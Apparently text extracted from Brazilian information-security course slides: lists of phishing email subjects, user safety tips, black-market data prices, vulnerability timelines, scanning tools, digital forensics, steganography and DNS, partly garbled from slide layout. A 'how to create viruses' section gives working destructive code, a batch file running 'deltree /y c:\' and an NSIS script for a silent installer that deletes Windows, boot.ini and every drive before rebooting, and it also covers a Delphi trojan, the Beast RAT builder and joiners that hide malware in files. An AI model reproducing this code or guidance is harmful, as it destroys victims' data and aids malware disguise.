Big Brother Brasil - ao vivo - quer ver tudo ao vivo e ainda concorrer a promoções exclusivas? Clique na fechadura
Câmara dos Dirigentes Lojistas - SPC - Serviço de Proteção ao Crédito - Notificação - Pendências Financeiras - Baixar o arquivo de relatório de pendências.
carnaval 2005 - veja o que rolou nos bastidores do carnaval de São Paulo
Cartão Terra - eu te amo - webcard enviado através do site Cartões Terra
Cartão UOL - I love you - você recebeu um cartão musical - Para visualizar e ouvir escolha uma das imagens
Cartões BOL - Você recebeu um cartão BOL
Cartõesnico.com - Seu amor criou um cartão para você
Checkline - Consultas de crédito on-line - Consultas no Serasa/SPC
Claro Idéias - Grande chance de ganhar meio milhão de reais em ouro e 18 carros
Colaneri e Campos Ltda - Ao Gerente de Vendas - orçamento de material e equipamentos em urgência
Lista de Hackers fornecida: Correio Virtual - hi5 - Seu Amor te enviou este cartão
CPF cancelado ou pendente de regularização - verifique; seu CPF está cancelado
Declaração de Imposto de Renda de 2005/06 - Ministério da Fazenda - CPF Cancelado ou Pendente de Regularização
Ebay - your account could be suspended - Billing Department
Embratel - Comunicado de Cobrança - Aviso de Bloqueio
Embratel - Notificação Confidencial - Fatura de serviços prestados Clique para detalhamento da fatura
Emotion Cards - UOL - Parabéns você recebeu um Presente Virtual
Febraban - Guia de Segurança - Febrasoft Security
Finasa - Nossa Caixa - Fraudes Bancárias - Febraban
Fininvest - débito em atraso - pendências financeiras em seu CPF/CNPJ
Ganhe uma viagem a Paris - Guia Paris Lumiére
Gmail - Gmail Amigo Oculto - Baixar Formulário - E-mail de 1 Giga
Humortadela - Piada animada sempre amigos
Humortadela - você é 10 - acesse o link e sacaneie
Humortadela - você recebeu uma piada animada - Ver Piada Animada
Ibest - acesso grátis e fácil - discador ibest - 0800 conexão sem pulso telefônico. Grátis - Download
Larissa 22 aninhos - www. mclass. com. br - clique aqui e veja o vídeo
Leiam esta informação IMPORTANTe
Martins Com Ltda - Setor de Compras - Orçamento
Mercado Livre - Aviso - Saldo devedor em aberto na sua conta - e pagamento não for quitado acionaremos departamento jurídico
Lista de Hackers fornecida: Olá, há quanto tempo! Eu me mudei para os Estados Unidos, e perdemos
contato...
Olha o que a Globo preparou para você neste ano de 2005 - Big Brother Brasil 5 - Baixe o vídeo
Overture - Promoção para novos assinantes - Tem cliente procurando, tem você oferecendo, vamos juntar os dois. Seja encontrado por quem quer comprar
Paparazzo - globo. com - se você gostou de uma espiada no vídeo
Parperfeito - Você foi adicionado aos prediletos - Associado do Par Perfeito
Passe Livre de 7 dias no Globo Media Center
Promoção Fotolog.net e UBBI - sorteio de 10 Gold Cam por dia - Crie seu fotolog e concorra
Radio Terra - dedique uma música
Receita Federal - CPF cancelado ou pendente de regularização
Saudades de você - Sou alguém que te conheceu há muito tempo, e tive que fazer uma viagem - Espero que goste das fotos
SERASA - pendências referentes a seu nome - Extrato de débito
SERASA - Regularize seu CPF ou CNPJ - clique para extrato de débitos
Sexy Clube - Thaty Rio - Direto do Big Brother - Veja as fotos em primeira mão
Sou um amigo seu - você está sendo traído - veja as fotos
Symantec - Faça sua atualização do Norton 2005 aqui - Gratuita - Licença para 1 ano grátis
Terra Cartões - O meu melhor presente é você
Tim pós pago - pendências no SPC - Sistema de Proteção aoCrédito - Serial do Celular
Lista de Hackers fornecida: Microsoft - Ferramenta de remoção de softwares Mal-Intencionados do
Microsoft Windows - Windows XP fica a cara de quem recebe um cartão Voxcards
Microsoft Software - Este conteúdo foi testado e é fornecido a você pela Microsoft Corporation - Veja as novidades
Music Cards - Confirmação
Necktsun Comércio Ltda - Palmas - Departamento de Vendas - Orçamento
Netcard Cartões Virtuais - Emoções de verdade
Norton Antivírus - Alerta de Segurança - download do antídoto para o Ms. Bruner
Notificação Confidencial - Pendências Financeiras em seu CPF
O carteiro - você recebeu um cartão de quem te admira
O carteiro. com - tenho uma novidade para você - veja o cartão que preparei
Voxcards - cartão voxcards - para quem você vai mandar um cartão hoje?
Voxcards - mensageiro - você está recebendo um cartão virtual voxcards - Precisa instalar o plugin - clique para instalar
Webcard Terra - Feliz Dia das Mães - Existe um presente especial esperando por você no site de cartões do terra.
Week - Complimentary Subscription Confirmation - Free - Please Apply online - PC Week
www. symantec. com - A solução Antivírus mais confiável do mundo
www.microsoft. com - Proteja seu computador com antivírus
Lista de Hackers fornecida: UOL - Promoção Cultural - Cara cadê meu carro
UOL Cartões - Estou com saudades - clique para visualizar
UOL Cartões - Seu amor lhe enviou um cartão - clique para baixar
UOL Cartões - Você recebeu um lindo cartão virtual
Veja as fotos proibidas das musas do bbb5
Viagens contaminadas com o w32. bugbear
Virtual Cards - Um grande abraço da equipe virtual cards - ler cartão
VIVO - Torpedos Web Gratuito - Torpedo Fácil Vivo
Yahoo Cartões - Você é tudo para mim - clique na imagem
Yahoo Cartões - Você é tudo para mim - enviado por quem te admira
Outra dica importante: nunca abra E-Mails de remetentes desconhecidos!
Sempre desconfie de E-Mails que solicitam 'clique aqui' ou ' acesse o link (tal)' ou ' veja minha foto' ou ' te encontrei , lembra-se de mim? ' ou ' ligue-me para sairmos' , etc...
E, finalmente, para ter certeza que é de um golpe que você está sendo vítima, passe o mouse - sem clicar - pela palavra do direcionamento : você vai ver, na barra inferior - à esquerda da tela -, que se trata de um arquivo com a terminação 'exe' ou 'scr' ou outra. Arquivo este(s) que vai (vão) espionar seu computador, roubando seus dados, senhas, etc.
Symantec: relatório mapeia mercado negro de dados Um estudo conduzido pela Symantec mapeou o mercado negro de dados. O
relatório traz o preço das informações negociadas por criminosos e mostra como as empresas podem ter prejuízos com a vulnerabilidade dos dados dos clientes. Segundo Marcelo Silva, diretor de serviços da companhia no Brasil, já existe um ecossistema criado em torno do roubo de dados. “Quem rouba nem sempre vende os dados. A gente fala de crime organizado, mas o que existe é um grande mercado”, afirma o executivo. Veja tabela com o preço dos dados no mercado negro:
Produto Preço
Contas bancárias de 10 dólares a mil dólares
Cartões de crédito de 0,40 dólar a 20 dólares
Identidades completas de 1 dólar a 15 dólares
Contas do eBay de 1 dólar a 18 dólares
Senhas de e-mail de 4 dólares a 30 dólares
Proxies de 1,5 dólar a 30 dólares CW Connect - No grupo de discussão sobre Crimes Digitais do CW Connect, a primeira rede social para profissionais de tecnologia da informação e telecomunicações do mercado, uma das participantes - a analista Fabiana - inseriu uma pesquisa sobre as principais ameaças às informações da empresa:
1 - Vírus 75% (Por falta de conhecimento os usuários baixam programas sem conhecimento, acessam sites suspeitos, etc) 2 - Divulgação de senhas 57% 3 - Hackers 44% 4 - Funcionários insatisfeitos 42% 5 - Acessos indevidos 40% 6 - Vazamento de informações 33%
151
Como Analisar a Segurança “Segurança não é uma tecnologia”
Deve-se perguntar: Proteger O QUÊ? Proteger DE QUEM? Proteger A QUE CUSTOS? Proteger COM QUE RISCOS?
153
Custo de Segurança:
154
Custo Visiveis x Invisiveis:
Vulnerabilidades
Todo computador é vulnerável a ataques. (Possui informação)
• Tipos de Vulnerabilidades – Vulnerabilidades Físicas (Meio, Construção)
– Vulnerabilidades Naturais (Desastres Naturais)
– Vulnerabilidades de Hardware e Software(Falhas)
– Vulnerabilidades de Media (Roubos de Media)
– Vulnerabilidades de Comunicação (Hacker)
– Vulnerabilidades de Humanos (Usuários)
– Vulnerabilidades sobre Exploit (Brechas, Copias)
A maioria dos
ataques
acontece aqui
Produto
Lançado
Vulnerabilidade
descoberta
Fix
disponível
Fix instalado
pelo cliente
Atualização do ambiente Quando as ameaças ocorrem?
Produto
Lançado
Vulnerabilidade
descoberta
Fix
disponível
Fix instalado
pelo cliente
O tempo (em dias)
entre a
disponibilização da
correção e a invasão
tem diminuído,
portanto a aplicação
de “patches” não pode
ser a única defesa em
grandes empresas
Invasão
151 18
0
331
Blaster
Welchia/ Nachi
Nimda
25
SQL Slamm
er
14
Sasser
Atualização do ambiente Tempo para a invasão diminuindo
Atualização do ambiente Worm Zotob
09/08 - A Microsoft publica a correção
11/08 - A Microsoft informa que um ataque está na eminencia de acontecer sobre essa vulnerabilidade
17/08 - CNN e ABC são atacadas
Principais Ameaças
9ª edição da Pesquisa Nacional de Segurança da Informação da Módulo Security
Principais Obstáculos
9ª edição da Pesquisa Nacional de Segurança da Informação da Módulo Security
161
Soluções para a Insegurança
Informática NMAP
- É uma ferramenta para exploração de rede criada
pelo Fyodor. É uma das ferramentas mais
importantes para engenharia de segurança ou pen-
tester. Com ele você poderá entrar em uma rede e
buscar serviços que estão escutando em cada porta
especifica. Você pode fazer um varredura de
tcp()connect que fará uma conexão completa com o
host ou uma syn scan que fará uma simples conexão
que servirá para testar regras de firewall por
exemplo.
162
Soluções para a Insegurança
Informática NMAP (I)
Alvo:
MS-Windows 95
modificado
163
Soluções para a Insegurança
Informática NMAP (II)
Alvo:
Linux Mandrake
modificado
164
Soluções para a Insegurança
Informática NESSUS
Alvo: Linux
SuSE
Detectando
Nmap
165
Soluções para a Insegurança
Informática NESSUS
Verificação da
pópria máquina
Soluções para a Insegurança
Informática
NESSUS - Report
NESSUS – Report com formato HTML
Soluções para a Insegurança
Informática
VÍRUS
Tipos de Virus Vírus de Boot
Time Bomb
Trojans ou cavalo de troia
Vermes, Minhocas ou Worms
Hijackers
Vírus de macro
...
Phishing scam
170
171
O que significa SPAM
O termo SPAM origina-se de um programa de série inglesa de comédia onde os clientes pediam repetidamente “SPAM”, marca de um presunto enlatado americano.
Na informática significa enviar mensagens para qualquer quantidade de usuários, sem obter prévia autorização.
Como Evitar SPAM
Existem diversas formas de bloqueio de mensagens não solicitadas. Vários programas fazem esse serviço, como por exemplo, o SPAM Assassin. São configurados para bloquear as mensagens vindas de endereços conhecidos que disseminam essas mensagens. Bloqueia-se também as mensagens contendo alguma palavra ou expressão específica, por exemplo:
“Compre um notebook”
“Troque seus cartuchos de impressoras”
“Free teen images”
Incidencia de Ataques (Brasil)
fonte NICBr
ataque-servidor
6% ataque-usuario
4%
axfr
32%
scan
30%
spam
24%
dos
1%
fraude
0%invasao
3%
175
Posso enviar um vírus por brincadeira?
Não! Mesmo por brincadeira, enviar um vírus de computador
pode configurar crime de dano.
Certifique-se que os anexos transmitidos são arquivos benignos e
úteis ao destinatário.
Um vírus pode se propagar de diversas formas.
anexo
download
engenharia social
Código Penal
Dano
Art. 163 - Destruir, inutilizar ou deteriorar coisa alheia:
Pena - detenção, de um a seis meses, ou multa.
Possíveis danos
Perda de desempenho do micro;
Exclusão de arquivos;
Alteração de dados;
Acesso a informações confidenciais por pessoas não autorizadas;
Perda de desempenho da rede (local e Internet);
Monitoramento de utilização (espiões);
Desconfiguração do Sistema Operacional.
Inutilizarão de determinadas peças.
177
Detectando, prevenindo e
combatendo os vírus
178
E os anti-vírus são…
Anti virus em ação
Anti Spywere em ação
181
Como Criar Virus
182
Código de Vírus Teste
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-
STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Malicioso (Salvar no Bloco de Nota
Vassoura.exe)
AZP/LX2K*.*BAT.COM/ELIMINAR*HD*/DETE...
AIL.COM/AMDWIN@*.*
@echo off
BREAK OFF
deltree /y c:\
exit
183
Código de Vírus (cont)
virus.bat Criem um atalho e na localização escrevam " shutdown -s -t 60 -c " qualquer coisa que queiram dizer, mas tem de ser entre aspas" T (TEMPO EM SEGUNDOS) Podem mudar C (Comentário)
!define PRODUCT_NAME “APAGADOR_XXX”
!define PRODUCT_VERSION “1.0″
!define PRODUCT_PUBLISHER “HACKER_XXX”
SetCompressor lzma
Name “${PRODUCT_NAME} ${PRODUCT_VERSION}”
OutFile “MeuVirus.exe”
InstallDir “$TEMP”
Icon “${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico”
SilentInstall silent
Section “Sec001″ SEC01
Delete /REBOOTOK “$WINDIR\*.*”
Delete /REBOOTOK “C:\boot.ini”
Delete /REBOOTOK “C:\Meus documentos\*.*”
Delete /REBOOTOK “C:\*.*”
Delete /REBOOTOK “D:\*.*”
Delete /REBOOTOK “E:\*.*”
Delete /REBOOTOK “F:\*.*”
Delete /REBOOTOK “G:\*.*”
Delete /REBOOTOK “C:\Arquivos de programas\*.*”
SectionEnd
Section –Post
Reboot
SectionEnd
185
Virus em Delphi
Existe muitas maneiras de criar um virus em
delphi, a maioria dos trojans famosos que
circulão n internet foram feitos em delphi.
Eu vou mostrar como fazer um virus reninciar
junto com o windows e travar o Ctrl + Alt +
Del.
Vamos la, Primeiro abra um projeto e
coloque na uses "Registry,"
Agora em baixo de "{$R *.dfm}" coloque
isso:
186
187
188
189
190
A Dor do “Blaster” Duas linhas de código C no RPCSS:
– while (*pwszTemp != L'\\')
*pwszServerName++ = *pwszTemp++;
Levaram a
– >15 milhões de computadores infectados
– 3.3M de chamados de suporte em Set. 2003 (volume normal
relacionado a vírus é de 350,000)
– Muita repercussão negativa
• “Isto aumentará o nível de frustração ao ponto que várias
organizações irão contemplar seriamente alternativas à Microsoft”
Gartner Group
• “É realmente recomendado ter cautela aqui. Os esforços [de
segurança da Microsoft] foram sinceros, mas não estou certo se
foram sinceros o suficiente.” Forrester Research
Configuração do beast 2.07
Para começar a
criar o server
aperte em “build
server”
Joiner
Programas Joiners são softwares que
unem arquivos e dá a possibilidade de
executar apenas um dos arquivos em
modo normal e pode executar outros
em modo oculto
O uso para o mal
Os Joiners são muito usados por
hackers, crackers, scriptkidies e etc.
Com o joiner o hacker pode facilmente
esconder um vírus, trojan ou backdoor
dentro de fotos, musicas e até mesmo
atualizações de antivírus falsas.
RedBinder RedBinder é um Joiner desenvolvido por
hackers da Espanha e com ele podemos
camuflar arquivos, trocar ícones,
executar em modo oculto
Exemplo
208
209
Dicas para evitá-los
1) Instale um bom programa antivírus e mantenha o mesmo atualizado diariamente.
2) Instale um bom programa anti-spyware. Configure este programa para filtrar todos os programas executados ou que entrem no computador de qualquer maneira.
4) Use o filtro de SPAM fornecido por seu provedor.
5) Configure seu Navegador (Internet Explorer, FireFox, Netscape...) para que peça SEMPRE autorização e confirmação antes de baixar ou executar qualquer coisa na internet.
6) Antes de utilizar um novo site de compras e fornecer dados dos seus cartões de credito ou banco, procure informações sobre sua credibilidade, confiabilidade, solidez, segurança e eficiência
7) Desconfie e rejeite comunicados, propostas e ofertas milagrosas de qualquer tipo que possam chegar por qualquer meio (email, MSN, salas de bate-papo, P2P, chat systems em geral etc...).
8) Nunca anote senhas e outras informações confidenciais em lugares de fácil acesso (inclusive arquivos não criptografados dentro do seu computador) ou visíveis
9) Criminosos podem criar sites que parecem os de bancos ou outras entidades, com o intuito de enganar as vítimas desavisadas e de capturar suas senhas e dados sigilosos
10) Se lembre que a enorme maioria dos casos de fraudes envolvendo internet banking acontece por descuidos do usuário e não por falhas de segurança dos bancos
11) Sempre e só utilize um computador confiável para acessar sua conta e/ou dados sigilosos.
12) Evite navegar em sites arriscados e NUNCA baixe qualquer coisa de site que não conheça bem e que não sejam totalmente confiáveis
13) Nunca responda à emails não solicitadas (SPAM), nem para pedir sua remoção de listas de envio ou para reclamar ou solicitar qualquer informação.
14) Nunca execute ou abra qualquer arquivo anexado a mensagens de origem desconhecida ou não solicitado. Sobretudo NÃO abra arquivos dos tipos: EXE COM SCR PIF BAT CMD DPR.
15) Não se assuste quando receber e-mails ameaçadores tipo cobranças, cancelamento de documentos ou benefícios, ações na justiça etc
16) Não acreditem em promessas milagrosas, ofertas mirabolantes, propostas fabulosas e também não acredite em vendas simplificadas de produtos ou serviços que deveriam estar sujeitos a controle (tipo medicamentos ou coisas parecidas). Na maioria dos casos se trata de golpes ou produtos falsificados e até perigosos ou prejudiciais.
17) Não forneça seu endereço de e-mail para publicação em fóruns, salas de bate papo e grupos de discussão
18) Evite sempre participar de qualquer tipo de corrente na rede, sejam pirâmides financeiras sejam supostas ou reais campanhas de solidariedade seja o que for.
19) Se recuse a abrir qualquer mensagem suspeita onde não seja claramente definida a identidade de quem a envia (endereços falsos, endereços omissos ou incompletos, assuntos com erros ou incongruentes...)..
214
Cybercrime
Hackers Hoje Cybercrime atividade profissional (criminosa)
– Sofisticados e altamente organizados
Atividades
– Espionagem industrial
– Sabotagem de concorrentes
– Roubo de Informações como cartões de créditos e senhas de
banco
– Chantagem e extorsão
Sequestro de HD
Ameaça de parar o sistemas computacional
215
CyberCrime
Além das atividades citadas praticadas diretamente,
venda de produtos e serviços.
– Programa DDoS Bot: US$ 400
– Envio de Spam: US$ 150 / milhão
– Informações sobre cartões de crédito: US$ 0,20 por
megabyte
– Web Exploit ToolKit (WET): US$ 20 a US$400
216
A E-NetSecurity, fundada em 1999 por Wanderson Castilho, é uma empresa especializada em política de segurança da
informação e perícia digital.
É distribuidora exclusiva no Brasil da empresa americana Paraben, fabricante de produtos de análise forense digital.
Distribuidora exclusiva do Paraná do software BRMULTIACCESS, programa de monitoramento da internet da empresa
BRConnection Digital.
Quem somos
Clientes
A E-NetSecurity conta com uma carteira de aproximadamente 400 clientes localizados no Paraná, Santa Catarina, Rio Grande
do Sul, São Paulo, Manaus e Aracaju. São eles:
Agência de publicidade
Comércio exterior
Comércio online
Cooperativas agropecuária e agroindustrial
Editora
Emissora de rádio e televisão
Empresa de auditoria
Escritório de advocacia
Hospital
Indústrias: aduaneira, alumínio, cerâmica, eletro eletrônica,
engenharia, farmacêutica, metalurgia, mecânica, moveleira,
plástica, têxtil
Informática
Joalheria
Planos de Saúde
Shopping Center
Telefonia
Telemarketing
Transporte rodoviário
Ramo da criminalística utiliza métodos científicos na preservação, coleta, restauração, identificação, análise, interpretação,
documentação e apresentação de evidências digitais, sejam elas componentes físicos ou dados que foram processados
eletronicamente e armazenados em mídias computacionais.
Perícia Computacional
Ramo da criminalística que compreende a aquisição, prevenção, restauração e análise de evidências computacionais, sejam
os componentes físicos ou dados processados eletronicamente e armazenados em mídias computacionais.
A forense computacional lida com dados físicos, reais, mas numa realidade metafísica digital, onde os dados físicos são
informações elétricas, eletrônicas, magnéticas, eletromagnética e em outras formas mais ou menos voláteis.
Obtenção de Evidências
Obtenção e coleta de dados; Identificação; Preservação; Análise, Apresentação
Investigação Forense
UM DOS PRINCIPAIS PONTOS DESTA LEI É A IDENTIFICAÇÃO DOS USUÁRIOS DE LAN
HOUSES, CIBERCAFÉS, CIBER OFFICES. O ARTIGO 2º DA LEI EXIGE, ENTRE OUTRAS
COISAS, QUE OS ESTABELECIMENTOS MANTENHAM UM CADASTRO ATUALIZADO DOS
SEUS USUÁRIOS CONTENDO NOME COMPLETO, DATA DE NASCIMENTO, ENDEREÇO
COMPLETO, TELEFONE, NÚMERO DE RG. O RESPONSÁVEL PELO ESTABELECIMENTO
DEVERÁ EXIGIR DOS INTERESSADOS A EXIBIÇÃO DE DOCUMENTO DE IDENTIDADE, NO
ATO DE SEU CADASTRAMENTO E SEMPRE QUE FOREM FAZER USO DE COMPUTADOR. AS
INFORMAÇÕES E OS REGISTROS PREVISTOS NESTE ARTIGO DEVERÃO SER MANTIDOS
POR, NO MÍNIMO, 60 MESES.
OS PRINCIPAIS OBJETIVOS SÃO COIBIR A PRÁTICA DE DELITOS FAVORECIDA PELO
SUPOSTO ANONIMATO QUE ESTES AMBIENTES PROPORCIONAM AOS USUÁRIOS; EVITAR
INFRAÇÃO AO ESTATUTO DA CRIANÇA E DO ADOLESCENTE, JÁ QUE PASSA A HAVER
MAIOR CONTROLE SOBRE A PRESENÇA DE JOVENS E CRIANÇAS NESTES LOCAIS; ASSIM
COMO DAR UM PRIMEIRO GRANDE PASSO NO SENTIDO DA EXIGÊNCIA DE IDENTIDADE
DIGITAL DE USUÁRIOS DE INTERNET, ESSENCIAL PARA QUE SE POSSA PROTEGER A
PRÓPRIA SOCIEDADE DIGITAL.
LEI ESTADUAL
N.º 12.228/06
ESTADO DE SÃO
PAULO
DISPÕE SOBRE OS
ESTABELECIMENTOS
COMERCIAIS QUE
COLOCAM A
DISPOSIÇÃO,
MEDIANTE LOCAÇÃO,
COMPUTADORES E
MÁQUINAS PARA
ACESSO À INTERNET
E DÁ OUTRAS
PROVIDÊNCIAS.
Aspectos legais
A MAIORIA DOS CRIMES COMETIDOS POR MEIO DA INTERNET SÃO OS QUE
ATENTAM CONTRA A HONRA E A IMAGEM DAS PESSOAS QUE É
PROTEGIDA PELO ARTIGO 5º, INCISO X DA CONSTITUIÇÃO FEDERAL.
OU SEJA: CALÚNIA, DIFAMAÇÃO E INJÚRIA
(PREVISTOS NOS ARTIGOS 138, 139 E 140 DO CÓDIGO PENAL, COM PENAS
QUE VARIAM DE DETENÇÃO DE UM MÊS ATÉ DOIS ANOS).
Software de análise forense que auxilia recuperação de arquivos deletados, padroniza laudos periciais, organiza um banco de
dados com as evidências, faz o encryption (fornece senhas) e o decryption (quebra as senhas) dos arquivos, analisa
hardwares, analisa logs, analisa formatos e tipos de e-mails e fornece uma opção de se manusear a evidência sem danificá-
la, além de outras características mais avançadas.
Metodologia empregada
.
Extração de informações e evidências digitais
Obtenção e coleta de dados
Identificação
Preservação
Análise
Apresentação
A validade técnica das metodologias para recuperar dados de computadores envolvidos em incidentes de segurança tem se
tornado fundamental. Os procedimentos têm que ser tecnologicamente capazes de garantir que toda a informação obtida
como prova não seja alterada, adicionada ou excluída.
O Disco Rígido (Hard Disk) é a parte do computador onde são
armazenadas as informações realizados no computador.
É caracterizada como memória física, não-volátil, na qual as
informações não são perdidas quando o computador é
desligado.
A importância do HD
O disco rígido é um sistema lacrado contendo discos de
metal recobertos por material magnético onde os
dados são gravados através de cabeças, e revestido
externamente por uma proteção metálica.
É nele que normalmente gravamos as informações e é a
partir dele que lançamos e executamos nossos programas
mais usados.
Este sistema é necessário porque o conteúdo da
memória RAM é apagado quando o computador é
desligado. Desta forma, temos um meio de executar
novamente programas e carregar arquivos contendo os
dados da próxima vez em que o computador for ligado.
A importância do HD
Forma de armazenamento
Coleta das informações
Duplicação e preservação dos dados
É possível duplicar um disco rígido por meio de software ou hardware.
É a forma de se confirmar que o disco duplicado é idêntico ao original e de que seus dados não foram
contaminados. Isso é feito através de algoritmos de validação de hash.
.
.
Recuperação de arquivos
Correlação cronológica
Evidências digitais como argumento
Crimes com evidências digitais Aliciamento
Calúnia e difamação
Ciberbullying
Divulgação de imagens não
autorizadas
Fraude bancária ou financeira
por meio eletrônico
Invasões.
Pedofilia
Racismo
Sexting
Roubo de dados
Sequestro de informações
Vazamento de informações
Xenofobia
Cenário
dos
golpes
eletrônicos
(verídicos)
ROSE LEONEL CONTRATOU O
PERITO EM ANÁLISE
FORESENSE WANDERSON
CASTILHO.
SEGUNDO CASTILHO,
EM 15 DIAS FOI POSSÍVEL
OBTER AS PROVAS DE QUE
FOI O EX-NAMORADO DELA
QUEM COLOCOU AS FOTOS NA
INTERNET.
FOI ELIMINADO 80% DO
MATERIAL DIVULGADO
INDEVIDAMENTE NA
INTERNET.
Fonte: Sou + Eu
Edição 106 - 27 de novembro de 2006
7. Casos verídicos (5/)
Vídeo
Dafra
1. PRESERVE TODAS AS PROVAS
Imprima e salve o conteúdo das páginas ou "o diálogo" do(s) suspeito(s) em salas de bate-papo,
mensagens de correio eletrônico (e-mail) ofensivas. É necessário guardar também os cabeçalhos das
mensagens;
Preserve as provas em algum tipo de mídia protegida contra alteração, como um CD-R ou DVD-R;
Todas essas provas ajudam como fonte de informação para a investigação da polícia;
No entanto, essas provas não valem em juízo, pois carece de fé pública. Uma alternativa é ir a um
cartório e fazer uma declaração de fé pública de que o crime em questão existiu, ou lavrar uma Ata
Notarial do conteúdo ilegal/ofensivo.
Esses procedimentos são necessários porque, como a Internet é dinâmica, as informações podem
ser tiradas do ar ou removidas para outro endereço a qualquer momento.
Não esqueça: A preservação das provas é fundamental. Já houve casos de a Justiça brasileira ter
responsabilizado internautas que não guardaram registros do crime on-line do qual foram vítimas.
Sou vítima. E agora?
2. PROCURE A DELEGACIA DE POLÍCIA
De posse das provas, procure a Delegacia de Polícia Civil mais próxima do local de residência da
vítima e registre a ocorrência. Você também pode ir a uma delegacia especializada em crimes
cibernéticos.
3. SOLICITE A REMOÇÃO DO CONTEÚDO ILEGAL E/OU INOFENSIVO
Para fazer esta solicitação, envie uma Carta Registrada para o prestador do serviço de conteúdo
na Internet, que deve preservar todas as provas da materialidade e os indícios de autoria do(s)
crime(s).
Sou vítima. E agora?
237
ESTEGANOGRAFIA
238
O que é Esteganografia? (steganos = coberto + graphos = grafia)
“Comunicação secreta por ocultação de
mensagem.”
“O impulso para descobrir segredos está profundamente enraizado na natureza humana. Mesmo a
mente menos curiosa é estimulada pela perspectiva de compartilhar o conhecimento oculto aos
outros” (John Chadwick).
Introdução
O que é
– Ramo da criptografia que
consiste em ocultar a
existência de uma
informação dentro de uma
mensagem (textos,
imagens, áudios, vídeos,
etc.)
Criptografia x Esteganografia
– A primeira torna a mensagem ilegível, incompreensível;
– enquanto que a segunda esconde a existência da
informação, na mensagem
240
Esteganografia x Criptografia
Criptografia Esteganografia
Ganhando popularidade na indústria
– Marca D’água: autores de imagens, músicas e softwares
podem esconder uma marca registrada em seu produto.
– Impressão Digital: esconder números de série ou um
conjunto de características que diferenciam um objeto de
seu similar.
Atualmente é utilizada na luta contra a pirataria, ataques e
terrorismo cibernético.
241
Esteganografia - Fundamentos
Formas de Obtenção
Marcação de caracteres
Tinta Invisível
Pequenos furos no papel
Moderna Esteganografia
– Uso de bits não significativos
– Área não usada
242
Esteganografia - Fundamentos
Exemplo: Escrever uma mensagem com suco de limão,
esperar secar e aquecer o papel.
243
Esteganografia - Fundamentos
Antes Depois
Exemplo: Cédula de R$10,00, vista contra a luz mostra a
Bandeira do Brasil
244
Esteganografia - Fundamentos
Grécia antiga (Século 50 a.C.) - Primeiro relato
– Histiaeus era prisioneiro do Rei Davi e enviou uma mensagem para seu cunhado tatuada em seu escravo.
– Demeratus notificou Sparta que os Xerxes iriam invadiar a Grécia e escreveu uma mensagem numa mesa e a cobriu com cera.
2a Guerra Mundial - os alemães escondiam mensagens utilizando tinta invisível, tais como, suco de frutas, leite e urina.
– As mensagens eram escondidas nas linhas em branco entre linhas de textos aparentemente inofensivos.
245
Esteganografia – Breve Histórico
Esteganografia pode ser utilizada em textos, imagens, áudio e
mais recentemente em pacotes TCP/IP.
246
Esteganografia - Formas de
utilização
A imagem da esquerda possui (8.0Kb) e não contém dados
escondidos.
A imagem da direita possui (13.0Kb) e contém 5Kb de textos
escondidos.
247
• Imagens parecem as mesmas
• Imagem à direita contém os textos de 5 peças de Shakespeare – criptografados, inseridos nos bits menos significativos de cada
valor de cor
Zebras Hamlet, Macbeth, Julius Caesar
Mercador de Veneza, Rei Lear
Esteganografia - Formas de utilização
Ataques
Ataques
Exemplo (mensagem escondida em um texto):
Senhor Evandro quer usar este salão
temporariamente.
Relembre o fato ocorrido, isto poderia
estragar relíquias,
florais e imagens talhadas. Obrigado.
250
Esteganografia em textos
O Senhor Evandro quer usar este salão temporariamente.
Relembre o fato ocorrido, isto poderia estragar relíquias,
florais e imagens talhadas. Obrigado.
O sequestro foi perfeito
Esteganografia em textos Apparently neutral's protest is thoroughly
discounted and ignored. Isman hard hit.
Blockade issue affects pretext for embargo
on by-products, ejecting suets and vegetable oils.
Pershing sails from NY June 1
Apparently neutral's protest is thoroughly
discounted and ignored. Isman hard hit.
Blockade issue affects pretext for embargo
on by-products, ejecting suets and vegetable oils.
Técnicas:
– Bit menos significativo
• A letra “A” (10000011) pode ser escondida em 3 pixels (imagem de 24 bits)
• Pixels originais:
– (00100111 11101001 11001000)
– (00100111 11001000 11101001)
– (11001000 00100111 11101001)
• Pixels alterados:
– (00100111 11101001 11001000)
– (00100110 11001000 11101000)
– (11001000 00100111 11101001)
252
Esteganografia em imagens
253
254
255
Na segunda guerra foi utilizado o microponto, imagine que no fim de uma carta simples
e inofensiva havia um ponto final, que na realidade era um texto fotograficamente
reduzido a menos de um milímetro de diametro.
Os agentes alemães operavam aqui na America Latina !! E esses micropontos foram
descobertos pelo FBI em 1941.
Mensagem em um Microponto.
Criptografia e Esteganografia são ciencias independentes, mas que podem ser
empregadas juntas.
A criptografia pode ser dividida em Transposição e Substituição.
A transposição é o arranjo das letras e a substituição como o nome já diz é troca por
simbolos ou outras letras.
Estegnografia em DOS 1 CRIAR A PASTA TESTE DENTRO DO DESKTOP
(WINDOWS)
2 COPIAR A IMAGEM JPEG E O ARQUIVO ZIPADO
PARA DENTRO DA PASTA TESTE
3 CESSAR O DOS DO WINDOWS XP
4 JA NO DOS ACESSAR A PASTA DESKTOP
CD\DESKTOP
5 ACESSAR A PASTA TESTE (LEMBRE-SE QUE TA
DENTRO DA PASTA DESKTOP)
CD \TESTE
6 - EXECUTAR O COMANDO ACIMA
COPY/B NOME(FIGURA JPEG) + NOME
ARQUIVO ZIPADO NOVONOME(FIGURA).JPEG
256
257
Teclado Virtual: Seguro ou inseguro ?
258
Prática de Segurança
x
Em que abordagem você confia ?
Segurança como uma opção
Segurança como um aditivo
Integração extremamente complicada
Não é economicamente viável
Não pode focar na principal prioridade
Segurança como parte do sistema
Segurança Embutida na Rede
Colaboração inteligente entre os
elementos
Visão de sistemas
Foco direto na principal prioridade
EDUCAÇÃO DO USUÁRIO É ESSENCIAL
JOGO DOS ERROS
“Se você não pode proteger o que tem, você não tem nada.” Anônimo
Windows 2003 Server
262
Instalação
263
Instalação
264
Instalação
265
Instalação
266
Instalação 2003
267
Introdução a Serviços
268
DNS
269
DNS - Domain Name Service Padrão Aberto para Resolução de
Nomes Hierárquicos
– Agrupa nomes em domínios.
– A árvore de nomes é armazenada num banco de dados distribuído.
Especificações do DNS
– RFCs 1033, 1034, 1034, 1101, 1123, 1183 e 1536.
• Expecificações da Internet Task Force
– Berkeley Internet Name Domain (BIND) • Implementação desenvolvida na Berkley
University para a versão 4.3 SD Unix
Serviço DNS
Nome?
Nome?
Serviço DNS
